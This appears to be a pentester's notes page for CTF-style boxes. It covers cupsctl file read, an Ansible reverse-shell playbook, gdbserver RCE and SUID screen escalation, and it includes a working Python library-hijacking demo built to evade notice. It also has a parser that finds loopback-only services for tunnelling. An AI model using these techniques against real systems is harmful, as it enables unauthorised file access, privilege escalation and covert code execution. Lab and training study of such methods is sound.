Shuciran Pentesting Notes

Cupsctl LFI

LFI: if you can run cupsctl on the target (for example via sudo), you get an arbitrary file read, because cupsctl can point the CUPS ErrorLog setting at any file and CUPS will then serve that "log" through its web interface. Set the path of the file you want to read: cupsctl ErrorLog="/root/root.txt" Then from the web server we need ...

Ansible RCE via YAML file

YML RCE: example playbook (test.yml) to obtain a reverse shell when you can get a privileged user to run ansible-playbook on a file you control. The keys sudo: true / sudo_user: root are the legacy spelling of become: true / become_user: root: --- - name: Display known facts for host hosts: 127.0.0.1 sudo: true sudo_user: root connection: local gather_facts: false ...

Drupal Exploitation

Drupal enumeration/exploitation. GitHub: drupwn. To get the tool working, first run its setup script: python setup.py install Then run the enumeration/exploitation binary ...

Python Library Hijacking

Library hijacking: a Python script does not import a library by full path; the interpreter resolves the module name through its search path (the script's own directory first, then PYTHONPATH, then the standard library and site-packages). If a directory searched before the genuine library is writable by you and the script is run by a more privileged user (typically via sudo), you can drop a module with the same name there and run your code as the user executing the script: alice@wonderland:/root$ sudo -l User ali...
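An added, self-contained demonstration of the hijack described above (example code written for these notes, not taken from the original page or from any tool it references). It builds a hypothetical victim script in a writable temporary directory, shows that the script directory is searched before the standard library, plants a rogue base64.py that runs a payload and then loads the real module so the victim keeps working, and runs the victim. The victim script, the marker file and the base64 target are all constructed for the demo; it assumes a Linux host, a file-based standard library and the interpreter's default (unsafe) sys.path behaviour.

```python
import importlib.util
import os
import subprocess
import sys
import tempfile


def real_module_file(module):
    """Path of the module the interpreter would normally import.
    Assumes a file-based module (not a zipped stdlib)."""
    return importlib.util.find_spec(module).origin


def hijack_candidates(script_path, module):
    """Writable directories searched *before* the real module's directory
    when `script_path` is run. sys.path[0] is always the script's own
    directory, so a writable script directory is the classic win; a
    writable PYTHONPATH entry or site-packages are the other cases.
    This interpreter's sys.path approximates what the victim sees
    (sudo with env_reset may strip PYTHONPATH)."""
    real_dir = os.path.dirname(real_module_file(module))
    search = [os.path.dirname(os.path.abspath(script_path))] + sys.path[1:]
    found = []
    for d in search:
        if not d or not os.path.isdir(d):
            continue
        if os.path.samefile(d, real_dir):
            break  # everything after this is searched too late
        if os.access(d, os.W_OK):
            found.append(d)
    return found


# Rogue module template. The payload runs as whoever executes the victim
# (root under sudo); afterwards the genuine module is loaded into this
# namespace so the victim behaves normally and the hijack goes unnoticed.
ROGUE = '''\
import importlib.util, os
with open({marker!r}, "w") as f:
    f.write("hijacked, uid=%d" % os.getuid())
_spec = importlib.util.spec_from_file_location({module!r}, {real!r})
_mod = importlib.util.module_from_spec(_spec)
_spec.loader.exec_module(_mod)
globals().update({{k: v for k, v in vars(_mod).items() if not k.startswith("__")}})
'''


def plant_rogue_module(directory, module, marker):
    """Write <module>.py into `directory`; returns the planted path."""
    path = os.path.join(directory, module + ".py")
    with open(path, "w") as f:
        f.write(ROGUE.format(module=module, marker=marker,
                             real=real_module_file(module)))
    return path


# Constructed victim: imports a module by name, exactly like a real admin script.
VICTIM = '''\
import base64
print(base64.b64encode(b"secret").decode())
'''


def run_demo(module="base64"):
    """Victim in a writable dir -> confirm it is a hijack candidate -> plant
    the rogue module -> run the victim. Returns (victim stdout, marker text)."""
    work = tempfile.mkdtemp(prefix="hijack-")
    victim = os.path.join(work, "victim.py")
    with open(victim, "w") as f:
        f.write(VICTIM)
    if work not in [os.path.abspath(d) for d in hijack_candidates(victim, module)]:
        raise RuntimeError("script directory is not writable or not searched first")
    marker = os.path.join(work, "payload.txt")
    plant_rogue_module(work, module, marker)
    # Drop PYTHONSAFEPATH if set: the technique relies on the default path order.
    env = {k: v for k, v in os.environ.items() if k != "PYTHONSAFEPATH"}
    proc = subprocess.run([sys.executable, victim], capture_output=True,
                          text=True, check=True, env=env)
    with open(marker) as f:
        return proc.stdout.strip(), f.read()


if __name__ == "__main__":
    print(run_demo())
```

The victim still prints the correct base64 output, which is the point of re-loading the real module: a payload that breaks the privileged script gets noticed and fixed, a transparent one keeps running every time the admin invokes it.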

Services Running

On Windows, list TCP sockets with their state and owning PID: netstat -ano -p tcp On Linux use: ss -tulnp (or netstat -tulnp); the -p column only shows processes you own unless you run the command as root. Examples: [[StreamIO#^1d2840]] [[Antique#...
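An added example (written for these notes, not part of the original page) that parses both output formats above into one record type and picks out the listeners bound only to loopback, which are the services an attacker cannot reach from outside and therefore the ones worth tunnelling (ssh -L or similar) during a pentest. The ss and netstat output below is constructed for the demo, not captured from a real host.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample output (not from a real host): `ss -tulnp` on Linux.
SS_SAMPLE = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
tcp   LISTEN 0      128          0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      511        127.0.0.1:3306       0.0.0.0:*     users:(("mysqld",pid=1033,fd=21))
tcp   LISTEN 0      128            [::1]:631           [::]:*     users:(("cupsd",pid=640,fd=7))
udp   UNCONN 0      0            0.0.0.0:68         0.0.0.0:*     users:(("dhclient",pid=520,fd=6))
"""

# Constructed sample output (not from a real host): `netstat -ano -p tcp` on Windows.
NETSTAT_WIN_SAMPLE = """\

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       2316
  TCP    10.10.11.5:49700       10.10.14.2:443         ESTABLISHED     5120
"""


@dataclass
class Socket:
    proto: str
    addr: str
    port: Optional[int]
    state: str
    pid: Optional[int]
    process: Optional[str]


def split_addr(s: str):
    """'127.0.0.1:3306' -> ('127.0.0.1', 3306); '[::1]:631' -> ('::1', 631);
    a wildcard port ('0.0.0.0:*') yields None for the port."""
    host, port = s.rsplit(":", 1)
    return host.strip("[]"), (int(port) if port.isdigit() else None)


SS_PROC = re.compile(r'\(\("([^"]+)",pid=(\d+)')


def parse_ss(text: str) -> List[Socket]:
    """Parse `ss -tulnp` lines: Netid State Recv-Q Send-Q Local Peer Process."""
    out = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 6 or f[0] not in ("tcp", "udp"):
            continue  # header or blank line
        host, port = split_addr(f[4])
        m = SS_PROC.search(line)
        out.append(Socket(f[0], host, port, f[1],
                          int(m.group(2)) if m else None,
                          m.group(1) if m else None))
    return out


def parse_netstat_windows(text: str) -> List[Socket]:
    """Parse Windows `netstat -ano`: TCP rows carry a State column, UDP rows
    do not, so the field count tells them apart."""
    out = []
    for line in text.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP":
            proto, local, state, pid = "tcp", f[1], f[3], f[4]
        elif len(f) == 4 and f[0] == "UDP":
            proto, local, state, pid = "udp", f[1], "UNCONN", f[3]
        else:
            continue
        host, port = split_addr(local)
        out.append(Socket(proto, host, port, state, int(pid), None))
    return out


def listening(socks: List[Socket]) -> List[Socket]:
    return [s for s in socks if s.state in ("LISTEN", "LISTENING", "UNCONN")]


def loopback_only(socks: List[Socket]) -> List[Socket]:
    """Listeners bound to 127.x or ::1: invisible to a remote port scan and
    the first candidates for port forwarding once you have a shell."""
    return [s for s in listening(socks) if s.addr.startswith(("127.", "::1"))]


if __name__ == "__main__":
    for s in loopback_only(parse_ss(SS_SAMPLE)) + loopback_only(parse_netstat_windows(NETSTAT_WIN_SAMPLE)):
        print(f"{s.proto}/{s.port} on {s.addr} pid={s.pid} {s.process or ''}")
```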

Backdoor (Medium)

Content: WordPress Local File Inclusion (LFI); LFI to RCE (abusing /proc/PID/cmdline); gdbserver RCE; abusing screen (privilege escalation); [Session synchronizatio...

GDBServer 9.2 RCE

If an exposed gdbserver is version 9.2 or older, it can be exploited for RCE. Note that gdbserver does not authenticate clients at all, so any host that can reach the listening port can write into the debugged process's memory and resume it; the version check is only what the public exploit keys on. Exploit: gdbserver sudo python3 gdbserver_rce.py 10.10.11.125:1337 rev.bin Examples: Backdoor

SUID Screen Exploitation

Screen: if screen is installed SUID, look for a detached session belonging to another user and attach to it to escalate privileges. First run the following command: ps -aux | grep screen If there is indeed a screen comma...

Azure Devops Enumeration

Azure DevOps Server is a Microsoft product that provides version control, reporting, requirements management, project management (for both agile software development and waterfall teams), automated...

SCP

SCP. To download a file from the remote host: scp <Username>@<IPorHost>:<PathToFile> <LocalFileLocation> To upload a file to the remote host: scp file.txt remote_username@10.10.0.2:/remote/directory